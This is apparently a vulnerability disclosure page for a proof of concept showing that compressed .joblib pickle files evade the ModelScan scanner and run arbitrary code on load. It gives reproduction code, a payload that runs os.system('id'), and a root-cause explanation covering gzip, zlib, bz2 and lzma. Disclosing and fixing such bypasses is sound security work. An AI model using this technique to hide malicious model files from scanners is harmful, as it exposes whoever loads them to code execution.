ModelScan Scanner Bypass — Compressed Joblib PoC
Bug: Compressed .joblib files bypass ModelScan pickle safety scanner → ACE
Affected: modelscan==0.8.8 (latest) + joblib==1.5.3 (latest)
Reported: huntr.com — Model File Vulnerability Program
File
| File | Format | Size | ModelScan issues |
|---|---|---|---|
evil_compressed.joblib |
gzip-compressed pickle | 56B | 0 (bypass confirmed) |
Reproduce
import pathlib, joblib
from modelscan.modelscan import ModelScan
path = pathlib.Path("evil_compressed.joblib")
# 1. Scan — should detect, actually returns 0 issues
result = ModelScan().scan(path)
print(result["summary"]["total_issues"]) # → 0 (BYPASS)
# 2. Load → payload fires
joblib.load(path) # executes os.system("id")
# → uid=1000(user) gid=1000(user) groups=1000(user)
Root cause
picklescanner.py passes raw compressed bytes to pickletools.genops().
First byte (\x1f) is not a valid pickle opcode → exception at byte 0
→ globals_opt = None → ScanResults(issues=[]) → silent bypass.
All 4 compression formats affected: gzip, zlib, bz2, lzma.
Inference Providers NEW
This model isn't deployed by any Inference Provider. 🙋 Ask for provider support